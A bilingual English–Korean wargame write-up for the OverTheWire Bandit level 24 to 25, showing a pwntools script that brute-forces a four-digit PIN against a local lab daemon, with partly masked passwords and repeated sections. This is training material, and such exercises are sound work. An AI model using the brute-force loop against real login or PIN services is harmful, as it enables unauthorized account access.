The current write-up that you are viewing is an ordinary write-up.
현재 보고계신 write-up은 일반 write-up 입니다.
To comply with the rule, in this write-up, I just deal with some hints related to this challenge. Here is no correct answer and no solution.
룰을 준수하기 위해, 이 문서에서는 이 챌린지와과 관련된 몇 가지 힌트만을 다룹니다. 여기에 정답과 솔루션은 없습니다.
For the full write-up PDF please refer to the Facebook page WARGAMER.
풀 write-up PDF는 페이스북 페이지 WARGAMER를 참고하세요.
WARGAMER(Link)
Bandit Level 24 → Level 25
Level Goal
A daemon is listening on port 30002 and will give you the password for bandit25 if given the password for bandit24 and a secret numeric 4-digit pincode. There is no way to retrieve the pincode except by going through all of the 10000 combinations, called brute-forcing.
레벨 목표
한 데몬이 30002번 포트를 열고 있고 "bandit25" 계정의 패스워드를 줄 것이다. 다만 "bandit24" 패스워드와 4 자리 핀 코드를 제출해야한다. 부르트 포싱이라고 알려진 방법을 사용하여 10000 가지의 경우의 수를 고려하지 않고는 핀 코드를 찾을 방법은 없다.
Level Goal
A daemon is listening on port 30002 and will give you the password for bandit25 if given the password for bandit24 and a secret numeric 4-digit pincode. There is no way to retrieve the pincode except by going through all of the 10000 combinations, called brute-forcing.
레벨 목표
한 데몬이 30002번 포트를 열고 있고 "bandit25" 계정의 패스워드를 줄 것이다. 다만 "bandit24" 패스워드와 4 자리 핀 코드를 제출해야한다. 부르트 포싱이라고 알려진 방법을 사용하여 10000 가지의 경우의 수를 고려하지 않고는 핀 코드를 찾을 방법은 없다.
This challenge requires the ability to develop a socket program. If you experienced socket related programming, It will be easier.
이 챌린지는 소켓 프로그램 개발 능력을 요구합니다. 만약 소켓 관련 프로그래밍 경험이 있다면 보다 수월할 것입니다.
This is some part of the resolution procedures. I could find the flag as follow.
이것은 풀이 과정중 일부입니다. 아래와 같이 플래그를 찾을 수 있었습니다.
bandit24@bandit:~$ nc 127.0.0.1 30002
I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.
UoM■■■■■■HyQXmg■■■■■■wOmw■■■hZ
Fail! You did not supply enough data. Try again.
UoM■■■■■■HyQXmg■■■■■■wOmw■■■hZ0001
Fail! You did not supply enough data. Try again.
bandit24@bandit:/tmp/myCode$ cat ./mycode.py
from pwn import *
HOST='127.0.0.1'
PORT=30002
r = remote(HOST, PORT)
bandit24pw = "UoMYT■■■■■■Xmg6g■■■■■wOmw1■■■Z "
for i in range(0, 10000):
subStr = ■■■■■■■■■pw + ■■■■■■■■■
r.sendline(subStr)
print "[Sended] " + subStr
rData=■■■■■■■■■■■■
print '[Received] ' + str(rData)
r.close()
bandit24@bandit:/tmp/myCode$
bandit24@bandit:/tmp/myCode$ python ./mycode.py
[+] Opening connection to 127.0.0.1 on port 30002: Done
[Sended] UoM■■■■■■HyQXmg■■■■■■wOmw■■■hZ 0000
[Received] I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.
[Sended] UoM■■■■■■HyQXmg■■■■■■wOmw■■■hZ 0001
[Received] Wrong! Please enter the correct pincode. Try again.
[Sended] UoM■■■■■■HyQXmg■■■■■■wOmw■■■hZ 0002
[Received] Wrong! Please enter the correct pincode. Try again.
[Sended] UoM■■■■■■HyQXmg■■■■■■wOmw■■■hZ 0003
[Received] Wrong! Please enter the correct pincode. Try again.
[Sended] UoM■■■■■■HyQXmg■■■■■■wOmw■■■hZ ■■■■
[Received] Wrong! Please enter the correct pincode. Try again.
[Sended] UoM■■■■■■HyQXmg■■■■■■wOmw■■■hZ ■■■■
[Received] Correct!
[Sended] UoM■■■■■■HyQXmg■■■■■■wOmw■■■hZ ■■■■
[Received] The password of user bandit25 is uN■■■■■■■■E7s■■■■■■■■vZ0r■■■■zG
I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.
UoM■■■■■■HyQXmg■■■■■■wOmw■■■hZ
Fail! You did not supply enough data. Try again.
UoM■■■■■■HyQXmg■■■■■■wOmw■■■hZ0001
Fail! You did not supply enough data. Try again.
- Program development 프로그램 개발. -
bandit24@bandit:/tmp/myCode$ cat ./mycode.py
from pwn import *
HOST='127.0.0.1'
PORT=30002
r = remote(HOST, PORT)
bandit24pw = "UoMYT■■■■■■Xmg6g■■■■■wOmw1■■■Z "
for i in range(0, 10000):
subStr = ■■■■■■■■■pw + ■■■■■■■■■
r.sendline(subStr)
print "[Sended] " + subStr
rData=■■■■■■■■■■■■
print '[Received] ' + str(rData)
r.close()
bandit24@bandit:/tmp/myCode$
bandit24@bandit:/tmp/myCode$ python ./mycode.py
[+] Opening connection to 127.0.0.1 on port 30002: Done
[Sended] UoM■■■■■■HyQXmg■■■■■■wOmw■■■hZ 0000
[Received] I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.
[Sended] UoM■■■■■■HyQXmg■■■■■■wOmw■■■hZ 0001
[Received] Wrong! Please enter the correct pincode. Try again.
[Sended] UoM■■■■■■HyQXmg■■■■■■wOmw■■■hZ 0002
[Received] Wrong! Please enter the correct pincode. Try again.
[Sended] UoM■■■■■■HyQXmg■■■■■■wOmw■■■hZ 0003
[Received] Wrong! Please enter the correct pincode. Try again.
- Omission. 중략. -
[Sended] UoM■■■■■■HyQXmg■■■■■■wOmw■■■hZ ■■■■
[Received] Wrong! Please enter the correct pincode. Try again.
[Sended] UoM■■■■■■HyQXmg■■■■■■wOmw■■■hZ ■■■■
[Received] Correct!
[Sended] UoM■■■■■■HyQXmg■■■■■■wOmw■■■hZ ■■■■
[Received] The password of user bandit25 is uN■■■■■■■■E7s■■■■■■■■vZ0r■■■■zG